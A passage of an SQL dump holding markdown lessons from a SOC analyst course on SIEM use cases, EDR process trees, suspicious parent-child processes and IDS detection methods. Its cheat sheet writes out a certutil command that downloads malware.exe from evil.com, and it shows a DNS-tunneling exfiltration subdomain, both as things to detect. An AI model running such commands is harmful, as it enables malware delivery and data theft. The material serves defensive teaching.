core strength of Wazuh. It has thousands of pre-built rules mapped to PCI-DSS, HIPAA, GDPR, and MITRE ATT&CK.\n    *   *Rule Level*: Alerts are graded 1-15.\n    *   Level 3: \"Login success\" (Informational).\n    *   Level 12: \"Suspicious shell spawned\" (Critical).\n\n#### 3. The Wazuh Dashboard (Indexer)\n*   Historically based on Kibana (OpenSearch Dashboards).\n*   Provides a beautiful UI to visualize FIM changes, compliance scores, and threat alerts.\n\n### Wazuh vs. Traditional SIEM\nWazuh is technically an **XDR (Extended Detection and Response)** solution because it does more than just logs—it monitors the *state* of the endpoint.\n\n*   **Traditional SIEM**: \"I saw a log that says a file changed.\"\n*   **Wazuh**: \"I saw the file change, here is the diff of the content, here is the user who did it, and by the way, that user is running a vulnerable version of Sudo.\"\n\n### Use Case Example: Detecting a Web Shell\n1.  **Attacker**: Uploads `shell.php` to your web server (Apache).\n2.  **Wazuh FIM**: Detects a new file creation in `/var/www/html/`. Checks hash.\n3.  **Wazuh Rule**: \"New file created in web directory with PHP extension\" -> **Alert Level 7**.\n4.  **Attacker**: Accesses the shell. Apache logs 200 OK for `shell.php`.\n5.  **Wazuh Log Analysis**: Sees web request to the newly created file.\n6.  **Active Response**: Triggers a firewall-drop command for the attacker\'s IP.\n\n### Why Analysts Love Wazuh\n*   **Pre-tuned**: It comes out of the box with reasonable defaults. you don\'t have to write a rule to detect \"SSH Brute Force\"—it\'s already there.\n*   **Compliance View**: It has a dedicated view for \"PCI DSS\". You can click it and see exactly which requirements you are failing based on the logs.\n*   **Endpoint Visibility**: It gives you deep insight into the OS, not just the logs the OS decides to print.\n\n### Lab Insight\nIn the upcoming labs, you will likely interface with a SIEM dashboard. Whether it is Splunk, ELK, or Wazuh, remember: **The logic is the same.** You are looking for anomalies, correlating events across time, and validating the generated alerts.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(576, 228, '## Module 22 Review\nYou have completed the SIEM Fundamentals module. You should now understand:\n1.  **Aggregation, Normalization, Correlation**.\n2.  The difference between **Syslog** vs **Agent** ingestion.\n3.  How to read a normalized log vs a raw log.\n4.  The landscape of tools: Splunk, Sentinel, ELK, Wazuh.\n\nProceed to the next module to apply this knowledge in practical Use Cases.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 14:17:57'),
(577, 231, '## Use Case 1: Brute Force Attack (Easy)\n\n**Scenario**: An attacker is trying to guess a user\'s password to gain unauthorized access to the network. This is often the first step in an attack called \"Initial Access.\"\n\n### The Logic\nA brute force attack generates a distinct pattern: **Many Failures followed by (potentially) a Success**.\n\n### 1. The Data Sources\n*   **Source**: Windows Event Logs (Security) or Linux `/var/log/auth.log` or SSH logs.\n*   **Key Fields**:\n    *   `Event ID`: 4625 (Failure), 4624 (Success).\n    *   `Logon Type`: 3 (Network), 10 (RDP).\n    *   `Account Name`: The target user.\n    *   `Source IP`: The attacker\'s IP.\n\n### 2. The Pattern (Signatures)\n*   **Standard Brute Force**:\n    *   One Source IP targeting One User Account.\n    *   High frequency (> 10 failures in 1 minute).\n*   **Password Spraying** (Stealthier):\n    *   One Source IP targeting *Many* different User Accounts.\n    *   Tries \"Password123\" against User A, then User B, then User C.\n    *   Avoids locking out a single account.\n*   **Reverse Brute Force**:\n    *   Many Source IPs (Botnet) targeting One User Account.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event = \"Failed Login\"\n    AND\n    Count > 20\n    AND\n    Time_Window = 5 minutes\n    AND\n    Same Source_IP\n```\n\n### 4. Investigation Steps (The Playbook)\nWhen you see this alert, here is your workflow:\n1.  **Check the Username**: Does the account exist? Or is it `admin`, `root`, `test`? (Non-existent accounts usually imply an automated script).\n2.  **Check the Source IP**: Is it internal or external?\n    *   *Internal*: Could be a misconfigured service or script retry. Contact the machine owner.\n    *   *External*: Check Threat Intelligence (VirusTotal/AbuseIPDB). Is this a known bad IP?\n3.  **Check for Success**: **CRITICAL**. Did they eventually succeed?\n    *   Query: `source_ip=Attacker_IP AND action=Success`.\n    *   If **NO**: The firewall/account lockout did its job. Block the IP.\n    *   If **YES**: **Incident Declared**. The attacker is inside. Reset password immediately, isolate the host, and look for what they did next.\n\n### 5. False Positives\n*   User changed their Active Directory password, but their phone is still trying to sync email with the old password.\n*   A service account (cron job) with hardcoded credentials failing repeatedly.\n\n### 6. Real World Example\n`Oct 21 04:00:01 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:02 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:03 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:04 sshd[123]: Accepted password for root from 192.168.1.105 port 4422 ssh2`\n**Verdict**: Successful Brute Force. Priority Critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(578, 232, '## Use Case 2: Malware Beaconing (Easy)\n\n**Scenario**: A user clicks a malicious link. Malware installs on their laptop. The malware needs instructions, so it \"phones home\" to the attacker\'s Command & Control (C2) server. This checking-in process is called **Beaconing**.\n\n### The Logic\nBeaconing is automated. Computers form patterns (heartbeats); humans do not.\n\n### 1. The Data Sources\n*   **Source**: Firewall Logs, Proxy Logs, or DNS Logs.\n*   **Key Fields**:\n    *   `src_ip`: The infected laptop.\n    *   `dest_ip` or `dest_domain`: The C2 server.\n    *   `bytes_sent/received`: Usually small (just asking \"Any commands for me?\").\n    *   `frequency/interval`: The time between connections.\n\n### 2. The Pattern (Signatures)\n*   **Regularity**: Connection to the same IP every 60 seconds (or exactly 5 minutes, etc.).\n*   **Long Duration**: This connection happens 24/7, even when the user is asleep.\n*   **Jitter**: Sophisticated malware adds \"jitter\" (random delay) to hide. E.g., 60s, then 65s, then 58s.\n\n### 3. The SIEM Rule (Pseudocode)\nDetection often requires statistical analysis, not just simple matching.\n```sql\nAlert IF:\n    Same Source_IP connecting to Same Dest_IP\n    Count > 50 times in 24 hours\n    AND\n    Standard_Deviation(Time_Between_Connections) is Low (< 5 seconds)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Analyze the Destination**:\n    *   Is the domain `google.com` (benign) or `x83js92.ru` (suspicious)?\n    *   Is the destination IP hosting a known valid service (Microsoft Update) or a cheap VPS?\n    *   Use **Whois** to check domain age. (Newly registered domains < 30 days old are high risk).\n2.  **Analyze the Payload**:\n    *   Check Proxy logs. User-Agent string?\n    *   Is it `Mozilla` (Browser) or `Python-requests` (Script)?\n3.  **Check Endpoint**:\n    *   Identify the process making the connection.\n    *   Is `chrome.exe` connecting? Or is it `powershell.exe` connecting to the internet? (PowerShell connecting to a Russian IP is almost certainly bad).\n\n### 5. False Positives\n*   Legitimate software updates (Adobe Updater checks in every hour).\n*   NTP (Time sync) traffic.\n*   Telemetry from legitimate apps (Spotify \"I\'m still playing\" signals).\n\n### 6. Mitigation\n*   **Block**: Add the C2 IP/Domain to the Firewall blocklist.\n*   **Isolate**: Take the infected machine off the network.\n*   **Reimage**: Malware often has persistence mechanisms that are hard to remove partially; wiping the machine is safest.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(579, 233, '## Use Case 3: Impossible Travel (Medium)\n\n**Scenario**: A user\'s credentials have been compromised (stolen/phished). The attacker is logging in from their own country, while the legitimate user is logging in from the office.\n\n### The Logic\nA physical person cannot move faster than the speed of an airplane.\n\n### 1. The Data Sources\n*   **Source**: Identity Provider Logs (Azure AD, Okta, PingIdentity) or VPN Logs.\n*   **Key Fields**:\n    *   `User ID`: The account.\n    *   `Source IP`: The login location.\n    *   `GeoIP Data`: The SIEM enriches the IP with City/Country data.\n    *   `Timestamp`.\n\n### 2. The Pattern\n*   Login 1: London, UK at 14:00.\n*   Login 2: New York, USA at 14:30.\n*   Distance: 3,450 miles.\n*   Time Delta: 30 minutes.\n*   Required Speed: 6,900 mph. (Supersonic).\n*   **Conclusion**: Two different people are using the same credentials.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Login Success for User U from Location A at Time T1\n    AND\n    Login Success for User U from Location B at Time T2\n    AND\n    (Distance(A, B) / (T2 - T1)) > 600 mph\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the GeoIP**: Geo-location databases are not 100% accurate.\n    *   Is the IP *actually* in Russia, or is it a corporate VPN exit node that just *registers* to a HQ in Russia?\n2.  **Check for VPN Usage**:\n    *   Did the user turn on their corporate VPN? This might make them appear to \"jump\" from home to the datacenter instantly.\n3.  **Contact the User**: \"Hey, are you currently in Lagos, Nigeria?\"\n4.  **Review Activity**:\n    *   What did the \"Remote\" session do? Did they just check email, or did they download the entire \"Payroll\" folder?\n\n### 5. False Positives\n*   **Mobile + WiFi**: A user is on WiFi (IP A), then switches to 5G (IP B). IP B might geolocate to a carrier tower 300 miles away.\n*   **Cloud Proxies**: Zscaler or other cloud security tools can make traffic appear to originate from regional hubs.\n\n### 6. Remediation\n*   **Force Password Reset**: Invalidate the compromised credentials.\n*   **Revoke Sessions**: Kill active tokens so the attacker is kicked out immediately.\n*   **Enable MFA**: If not already on, this stops 99% of credential theft attacks.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(580, 234, '## Use Case 4: Privilege Escalation (Medium)\n\n**Scenario**: An attacker has gained access to a standard user account (\"Bob\"). Now they want to become an Administrator to install rootkits, dump passwords, or delete backups. This technique is **Privilege Escalation**.\n\n### The Logic\nStandard users should not be added to high-privilege groups. Administrative group formatting changes are rare and sensitive.\n\n### 1. The Data Sources\n*   **Source**: Windows Security Event Logs (Active Directory Domain Controller).\n*   **Key Fields**:\n    *   `Event ID`: **4728** (Member added to security-enabled global group), **4732** (Member added to security-enabled local group), **4756** (Member added to security-enabled universal group).\n    *   `Target Account`: The user being promoted (e.g., \"Bob\").\n    *   `Target Group`: The group being modified (e.g., \"Domain Admins\", \"Enterprise Admins\", \"Schema Admins\").\n    *   `Subject Account`: The user *doing* the adding (who made the change?).\n\n### 2. The Pattern\n*   Any addition to highly sensitive groups (Domain Admins) should be flagged.\n*   Frequent failures to add users to groups (Event 4728 failures) might indicate an attacker guessing permissions.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event_ID IN (4728, 4732, 4756)\n    AND\n    Target_Group IN (\"Domain Admins\", \"Administrators\", \"Enterprise Admins\")\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the Change Request**: Check the ticketing system (Jira/ServiceNow). Is there an approved ticket to make Bob an Admin?\n2.  **Check the Executor**: Who added Bob?\n    *   Was it a known Admin account?\n    *   Was it a Service Account? (Suspicious).\n    *   Was it Bob adding himself? (High Confidence Compromise).\n3.  **Time Context**:\n    *   Was this done at 3:00 AM on a Saturday? (Suspicious).\n    *   Was it done during business hours? (More likely legitimate).\n\n### 5. False Positives\n*   Legitimate IT operations. New Sysadmin hired, added to groups.\n*   Automated provisioning scripts (e.g., Identity Management systems) rotating memberships.\n\n### 6. Real World Risk\nIf an attacker reaches \"Domain Admin\", it is typically \"Game Over\". They can access every computer in the company, decrypt all passwords, and even create \"Golden Tickets\" to maintain access forever, even if you reset their password. Speed of detection here is critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(581, 235, '## Use Case 5: DNS Tunneling (Hard)\n\n**Scenario**: A firewall blocks all traffic (HTTP, SSH, FTP) except for DNS (Port 53). Attackers know DNS must be open for the internet to work. They encode stolen data inside DNS queries to sneak it past the firewall. This is **DNS Tunneling**.\n\n### The Logic\nDNS is meant for address lookups (Phonebook). It is not meant for data transfer. Tunneling creates data that looks essentially different from normal lookups.\n\n### 1. The Data Sources\n*   **Source**: DNS Server Logs, Firewall Logs (Port 53), or Passive DNS sensors (Zeek).\n*   **Key Fields**:\n    *   `Query`: The domain being requested (`xyz.example.com`).\n    *   `Query Type`: A, TXT, CNAME, NULL, MX.\n    *   `Response Size`: Size of the answer.\n\n### 2. The Pattern\n*   **Long Subdomains**:\n    *   Normal: `www.google.com`\n    *   Tunneling: `base64_packet1_part2_secret_data.attacker.com` -> `cGFzc3dvcmQxMjMK.attacker.com`.\n    *   The attacker controls the `attacker.com` authoritative nameserver, which logs the incoming query (and thus receives the stolen data).\n*   **High Volume**:\n    *   A normal user makes ~1000 DNS queries a day.\n    *   Tunneling requires thousands of queries to transfer a small file because each query can only hold a few bytes of data.\n*   **Rare Record Types**:\n    *   Using `TXT` or `NULL` records to pack more data into the response (C2 commands coming back).\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Length(DNS_Query) > 180 characters\n    OR\n    Count(DNS_Queries) to Same_Root_Domain > 1000 in 1 hour\n    OR\n    Unusual_Record_Type (TXT, NULL) with High Entropy (Randomness)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Decode the Subdomain**:\n    *   Copy the subdomain string. Try Base64 or Hex decoding it.\n    *   If it decodes to \"Confidential_Q3_Report.pdf\", you have confirmed data exfiltration.\n2.  **Check the Domain Reputation**:\n    *   Is the root domain (`attacker.com`) known?\n    *   Does it resolve to a legitimate site?\n3.  **Identify the Endpoint**:\n    *   Which machine is making the requests? Isolate it.\n    *   Check for tunneling tools like `dnscat2` or `iodine` running in the process list.\n\n### 5. False Positives\n*   **CDN / Anti-Virus Lookups**: McAfee/Sophos use DNS to check file hashes. These queries look like `long_random_hash.sophosxl.net`. This is legitimate.\n*   **Content Delivery Networks (Akamai)**: Often use long, complex subdomains.\n\n### 6. Why it\'s \"Hard\"\nDistinguishing between a legitimate detailed DNS lookup (like an AV signature check) and a malicious tunnel requires entropy analysis (measuring the randomness of the string), which simple rule logic struggles with. It usually requires Machine Learning or statistical baselining.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(582, 236, '## Module 23 Review\nYou have explored 5 critical SIEM Use Cases:\n1.  **Brute Force**: High volume failures.\n2.  **Beaconing**: Periodic C2 heartbeat.\n3.  **Impossible Travel**: Geo-velocity anomalies.\n4.  **Privilege Escalation**: Group changes and sudo abuse.\n5.  **DNS Tunneling**: Exfiltration via Port 53.\n\nThese rules form the baseline of most SOC detection strategies.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 14:17:57'),
(583, 241, '## Endpoint Detection and Response (EDR)\n\n**EDR** is the flight recorder for endpoints (laptops, servers, workstations). While a SIEM looks at the \"network\" and \"logs,\" an EDR looks at **execution** and **behavior**.\n\n### The Old World: Antivirus (EPP)\nTraditional Antivirus (AV), or Endpoint Protection Platforms (EPP), relied on **Signatures**.\n*   **The Method**: Compare a file\'s hash (SHA256) against a database of known bad files.\n*   **The Flaw**: If an attacker changes *one bit* of the file, the hash changes, and the AV misses it.\n*   **The Blind Spot**: AV cannot see \"Fileless Malware\" (e.g., PowerShell running a malicious script in memory). The file `powershell.exe` is legitimate, so AV ignores it.\n\n### The New World: EDR\nEDR assumes that **prevention will fail**. Its goal is **Detection** and **Visibility**.\nEDR records *everything* that happens on the device:\n1.  **Process Creation**: `cmd.exe` opened `powershell.exe`.\n2.  **Network Connections**: `powershell.exe` connected to `1.2.3.4`.\n3.  **File Modification**: `powershell.exe` wrote a file to `Temp`.\n4.  **Registry Changes**: `powershell.exe` added a generic Run key.\n\nBecause it records the *behavior*, it can detect attacks even if the malware file is brand new (Zero-Day).\n\n### Key Functions of EDR\n1.  **Continuous Monitoring**: Records activity 24/7, storing it either locally or in the cloud.\n2.  **Threat Hunting**: Allows analysts to query the database. \"Show me every computer that ran this specific PowerShell command.\"\n3.  **Automated Response**: \"If Ransomware behavior is detected, kill the process and isolate the machine.\"\n4.  **Remote Shell**: Allows analysts to remotely log in to the machine to investigate (like SSH, but through the EDR cloud).\n\n### Why EDR is Critical for SOC 1\nAs a Tier 1 Analyst, you will spend 50% of your time in the EDR console.\n*   The SIEM tells you **\"Something happened.\"**\n*   The EDR tells you **\"EXACTLY what happened.\"**\n*   *Example*: SIEM says \"Virus Detected on Host A\". EDR shows you that the user downloaded `invoice.zip` from Gmail, opened it, which spawned `cmd.exe`, which ran a script.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(584, 242, '## EDR vs. Legacy Antivirus: The Cage Match\n\nIt is important to clearly distinguish between these two technologies, even though marketing often blurs them.\n\n| Feature | Legacy Antivirus (AV) | Endpoint Detection & Response (EDR) |\n| :--- | :--- | :--- |\n| **Detection Basis** | **Signatures** (Matching known Bad) | **Behavior** (Matching suspicious Actions) |\n| **Visibility** | **Black Box**: \"I blocked a virus.\" (End of story) | **Flight Recorder**: \"I saw the user open Chrome, download X, run Y...\" |\n| **Fileless Attacks** | **Blind**: Cannot see in-memory attacks. | **Visible**: Sees memory allocation and script execution. |\n| **Response** | **Delete/Quarantine File** | **Isolate Host, Kill Process, Remote Shell** |\n| **Analyst Role** | Passive (Wait for alerts) | Active (Hunt and Investigate) |\n\n### The \"Next-Gen AV\" (NGAV)\nModern tools often combine both. CrowdStrike, SentinelOne, and Defender for Endpoint are actually **EPP (Prevention) + EDR (Detection)** in a single agent.\n*   They *do* block known malware (EPP).\n*   BUT they also record all activity for investigation (EDR).\n\n### Scenario: The PowerShell Attack\n1.  **Attack**: Hacker sends a Word Doc with a macro. The macro runs: `powershell.exe -enc <malicious_code>`.\n2.  **Legacy AV**: Scans `winword.exe` (Safe). Scans `powershell.exe` (Safe). **Result**: Infection.\n3.  **EDR**:\n    *   Sees `winword.exe` spawn `powershell.exe`. (Suspicious).\n    *   Sees `powershell.exe` make a network connection to a non-Microsoft IP. (Very Suspicious).\n    *   **Alerts**: \"Suspicious Process Chain from Word Document.\"\n    *   **Action**: Kills the PowerShell process tree.\n\n### Why \"Signatures\" are Dead\nAttackers use \"Polymorphism\". They automate their malware compilers to change the code structure every 10 seconds.\n*   To AV, it looks like a new file every time.\n*   To EDR, it looks like a program trying to encrypt the hard drive (Ransomware behavior). The behavior never changes.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(585, 243, '## The Process Tree: The DNA of an Attack\n\nIf you learn only one thing about EDR, let it be the **Process Tree** (or Parent-Child Relationship).\n\n### What is a Process?\nWhen you run a program (like Calculator), the Operating System creates a **Process**. It assigns it a **PID (Process ID)**.\n\n### Parent and Child\nProcesses do not appear out of thin air. They are spawned by other processes.\n*   **Parent**: The creator.\n*   **Child**: The created.\n\n**Normal Example**:\n1.  You double-click Chrome on your desktop.\n    *   Parent: `explorer.exe` (The Windows Desktop)\n    *   Child: `chrome.exe`\n2.  You open a PDF inside Chrome.\n    *   Parent: `chrome.exe`\n    *   Child: `AcrobatReader.exe`\n\n**Malicious Example**:\n1.  User opens an email attachment (`Invoice.docx`).\n    *   Parent: `outlook.exe`\n    *   Child: `winword.exe`\n2.  The document contains a malicious macro.\n    *   Parent: `winword.exe`\n    *   Child: `cmd.exe` (Command Prompt) **<-- RED FLAG**\n3.  The Command Prompt downloads malware.\n    *   Parent: `cmd.exe`\n    *   Child: `powershell.exe`\n\n### Visualizing the Tree\nEDR tools visualize this as a hierarchy DAG (Directed Acyclic Graph).\n```\nexplorer.exe (PID 1000)\n    |\n    |-- outlook.exe (PID 1200)\n         |\n         |-- winword.exe (PID 1300)  <-- \"Invoice.docx\"\n              |\n              |-- cmd.exe (PID 1400) <-- \"Active Malicious Content\"\n                   |\n                   |-- curl.exe (PID 1500)\n```\n\n### The Analyst\'s Job\nYour job is to look at this tree and ask: **\"Does this make sense?\"**\n*   Does Microsoft Word *need* to open the Command Prompt to show you a document? **No.**\n*   Does Adobe Reader *need* to run PowerShell to display a PDF? **No.**\n*   Does Chrome *need* to run the Calculator? **No.**\n\nThese illogical relationships are the **strongest indicators of compromise (IOCs)** in existence. They are harder for attackers to hide than file hashes or IP addresses.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(586, 244, '## Reading Process Ancestry: Who is your Father?\n\nTo catch advanced attackers, you must understand **Ancestry**. It\'s not just about the immediate parent, but the \"Grandparent\" and the whole lineage.\n\n### The \"Grandparent\" Context\nSometimes, the immediate parent looks okay, but the context is wrong.\n**Example**:\n`powershell.exe` running a script.\n*   Make sense? Maybe. Admins use PowerShell all the time.\n*   **Context 1 (Good)**:\n    *   Grandparent: `services.exe` -> Parent: `svchost.exe` -> Child: `powershell.exe` (Running a scheduled maintenance task).\n*   **Context 2 (Bad)**:\n    *   Grandparent: `chrome.exe` -> Parent: `cmd.exe` -> Child: `powershell.exe` (User downloaded a script from the browser and ran it).\n\n### Orphaned Processes\nSometimes, the Parent dies before the Child.\n*   `cmd.exe` spawns `malware.exe`.\n*   `cmd.exe` closes/exits.\n*   `malware.exe` is still running.\nIn Windows, the Parent ID (PPID) technically points to a non-existent process. Modern EDRs track this linkage historically so you can still see who the *original* parent was.\n\n### Spoofing (PPID Spoofing)\nAdvanced attackers can trick Windows. They can tell the OS: \"Launch my malware, but pretend that `explorer.exe` is the parent, not my hacking tool.\"\n*   This is called **Parent PID Spoofing**.\n*   **Detection**: EDRs look for discrepancies between the *recorded* parent and the *start time* of the process. If a Child process claims to be born 5 minutes *before* its Parent started, verified spoofing is likely occurring.\n\n### Standard Ancestry (What is Normal?)\nYou need to know what \"Normal\" looks like to spot the \"Abnormal\".\n*   `svchost.exe`: Generic host for services. Should usually be spawned by `services.exe`.\n*   `lsass.exe`: Local Security Authority. Should be spawned by `wininit.exe`.\n*   `explorer.exe`: The user shell. Spawned by `userinit.exe`.\n\nIf you see `lsass.exe` spawned by `winword.exe`, you are looking at an attack (likely Credential Dumping).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(587, 245, '## Suspicious Parent-Child Relationships (The Cheat Sheet)\n\nMemorize these. These are the \"Bread and Butter\" of Tier 1 Analysis. If you see these, you escalate the ticket.\n\n### 1. The \"Office\" Spawners (Macro Malware)\nAttack Vector: Phishing emails with malicious attachments.\n*   **Parent**: `winword.exe`, `excel.exe`, `powerpnt.exe`, `outlook.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe` (Command Prompt)\n    *   `powershell.exe`\n    *   `wscript.exe` / `cscript.exe` (Script engines)\n    *   `mshta.exe` (HTML Apps)\n    *   `rundll32.exe`\n*   **Verdict**: 99.9% Malicious. Office apps handles documents, not system administration.\n\n### 2. The \"Browser\" Spawners (Drive-By Downloads)\nAttack Vector: User visits a bad site, or is tricked into running a fake \"Update\".\n*   **Parent**: `chrome.exe`, `firefox.exe`, `msedge.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`, `powershell.exe` (Shells)\n    *   `whoami.exe`, `net.exe`, `ipconfig.exe` (Reconnaissance tools)\n*   **Verdict**: High Risk. Browsers should isolate web content. Spawning a shell means the sandbox was broken or the user was tricked.\n\n### 3. The \"Java/Adobe\" Spawners (Exploits)\nAttack Vector: Exploiting vulnerabilities in old PDF readers or Java runtimes.\n*   **Parent**: `acrord32.exe` (Adobe), `java.exe`, `javaw.exe`\n*   **Suspicious Children**:\n    *   `powershell.exe`\n    *   `cmd.exe`\n*   **Verdict**: Malicious.\n\n### 4. The \"LOLBins\" (Living Off The Land)\nAttackers use built-in Windows tools to hide.\n*   **CertUtil.exe**: Meant for certificates. Used by attackers to download files (like `wget`).\n    *   *Suspicious*: `certutil -urlcache -split -f http://evil.com/malware.exe`\n*   **Rundll32.exe**: Meant to run DLLs.\n    *   *Suspicious*: Loading a DLL from a Temp folder or User Profile.\n\n### 5. Service Exploitation (Web Servers)\nAttack Vector: Webshells / SQL Injection.\n*   **Parent**: `w3wp.exe` (IIS Web Server), `httpd.exe` (Apache), `tomcat.exe`, `sqlservr.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`\n    *   `whoami.exe`\n    *   `ping.exe`\n*   **Logic**: Your Web Server code (PHP/.NET) executes on the server. If that code spawns a command shell, it means the attacker has injected a command via the website (**Remote Code Execution - RCE**).\n*   **Verdict**: Critical. Server is fully compromised.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(588, 246, '## EDR Market Leaders\n\nJust like SIEM, the EDR market is consolidated around a few major players. You should recognize these names.\n\n### 1. CrowdStrike Falcon\nThe current market leader in enterprise.\n*   **Architecture**: 100% Cloud-native. The sensor on the laptop is extremely lightweight and sends telemetry to the CrowdStrike cloud.\n*   **Features**: Famous for its \"Overwatch\" service (human threat hunters at CrowdStrike who watch your alerts for you).\n*   **UI**: Known for its \"Process Tree\" visualization which set the standard for the industry.\n\n### 2. Microsoft Defender for Endpoint (MDE)\n*   **Advantage**: It is built into Windows 10/11. There is no agent to install; you just flip a switch in the cloud.\n*   **Integration**: Feeds directly into Azure Sentinel (SIEM).\n*   **Capabilities**: went from being a joke (old Windows Defender) to a top-tier Gartner leader. Excellent memory scanning.\n\n### 3. SentinelOne (Singularity)\n*   **Focus**: AI and Automation.\n*   **Feature**: \"Rollback\". If ransomware encrypts your files, SentinelOne can use Windows Shadow Copies to *undo* the encryption and restore the files automatically. This is a huge selling point.\n\n### 4. Carbon Black (VMware/Broadcom)\n*   One of the pioneers of EDR (formerly Bit9).\n*   Very granular control. Often used in high-security environments where you want to whitelist *every single file execution*.\n\n### 5. Cybereason\n*   **Focus**: \"MalOp\" (Malicious Operation). Instead of giving you 50 alerts, it groups them into 1 \"Operation\" to show the full story.\n*   **Visuals**: Very strong visualization of the attack timeline.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(589, 247, '## Module 24 Review\nEDR is your specialized camera for endpoints.\n*   It tracks **Behavior** (Process Trees), not just signatures.\n*   It allows **Live Response** (Shell access, Isolation).\n*   Understanding **Parent-Child relationships** is the #1 skill for EDR analysis.\n\nNext: Intrusion Detection Systems (Network visibility).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 14:17:57'),
(590, 251, '## Intrusion Detection Systems (IDS): The Burglar Alarm\n\nIf EDR protects the endpoint (the house) and SIEM watches the logs (the diary), the **IDS** watches the wire (the roads leading to the house). It analyzes network packets in real-time to find attacks.\n\n### NIDS vs. HIDS\nThere are two main flavors of IDS:\n\n#### 1. Network IDS (NIDS)\n*   **Location**: Sits on the network, usually behind the firewall or plugged into a Switch Span Port (Mirror Port).\n*   **Visibility**: Sees all traffic flowing through that segment.\n*   **Blind Spot**: It cannot see *encrypted* traffic (HTTPS) unless you are doing SSL Decryption (man-in-the-middle). It also can\'t see what happens inside the host (e.g., USB insertion).\n*   **Examples**: Snort, Suricata, Zeek (Bro).\n\n#### 2. Host IDS (HIDS)\n*   **Location**: Installed on the server/laptop itself (Software Agent).\n*   **Visibility**: Sees file changes, log entries, and memory. Crucially, it sees traffic *after* it has been decrypted by the web server.\n*   **Blind Spot**: If the OS is compromised (Rootkit), the HIDS might be disabled or lied to.\n*   **Examples**: OSSEC, Wazuh Agent (which includes HIDS), Tripwire.\n\n### IDS vs. IPS (Detection vs. Prevention)\n*   **IDS (Intrusion Detection System)**:\n    *   **Mode**: Passive.\n    *   **Action**: \"I see an attack. I will send an alert to the SIEM.\"\n    *   **Traffic**: It receives a *copy* of the traffic (Tap). It does not slow down the network.\n*   **IPS (Intrusion Prevention System)**:\n    *   **Mode**: Inline (Active).\n    *   **Action**: \"I see an attack. I am dropping the packet immediately.\"\n    *   **Traffic**: All traffic flows *through* it. If the IPS crashes, the network goes down (unless you have fail-open hardware).\n\n### Why use IDS if we have Firewalls?\n*   **Firewall**: Blocks based on Rules (IP, Port). \"Allow Port 80.\"\n*   **IDS**: Inspects the *content* of the packet on Port 80. \"Is this request asking for `index.html` (Good) or is it sending `Union Select 1,2,3...` (SQL Injection)?\"\n\nA Firewall is the Bouncer who checks ID. The IDS is the Security Guard watching the dance floor for fights.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(591, 252, '## Detection Methods: Signatures vs. Anomaly\n\nHow does an IDS know a packet is \"bad\"?\n\n### 1. Signature-Based Detection (The Database)\nThis is the traditional method. The IDS compares packets against a huge database of known attack patterns (Signatures).\n*   **Example**: \"If a packet contains the hex bytes `0x90909090` (NOP Sled), alert.\"\n*   **Pros**:\n    *   Low False Positives (Usually).\n    *   Fast.\n    *   Specific (Tells you exactly what the attack is: \"EternalBlue Exploit\").\n*   **Cons**:\n    *   Can only detect *known* attacks.\n    *   Useless against 0-days (Brand new exploits).\n\n### 2. Anomaly-Based Detection (The Baseline)\nAlso called \"Behavioral\". The IDS learns what \"Normal\" traffic looks like.\n*   **Learning Phase**: \"On Mondays, the Marketing Server sends 50MB of data to the Printer.\"\n*   **Detection**: \"Today (Monday), the Marketing Server sent 50GB of data to an IP in China.\" -> ALERT.\n*   **Pros**:\n    *   Can detect 0-days and unknown attacks (because the behavior is weird).\n*   **Cons**:\n    *   **High False Positives**. (Maybe the Marketing team is doing a backup? Maybe they hired a new guy who works weird hours?).\n    *   Requires a \"Training Period\" where the network must be clean (don\'t train on infected traffic!).\n\n### 3. Protocol Verification\nThe IDS knows how protocols (HTTP, DNS, TCP) *should* work.\n*   **Rule**: \"In HTTP, the Header must end with two newlines.\"\n*   **Attack**: An attacker sends a malformed header to crash the server.\n*   **Detection**: The IDS sees the protocol violation and alerts, even without a specific signature for that specific exploit tool.\n\n### The Modern Approach\nMost modern systems use **Hybrid Detection**. They use Signatures for the easy stuff and Anomaly/ML for the complex stuff.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
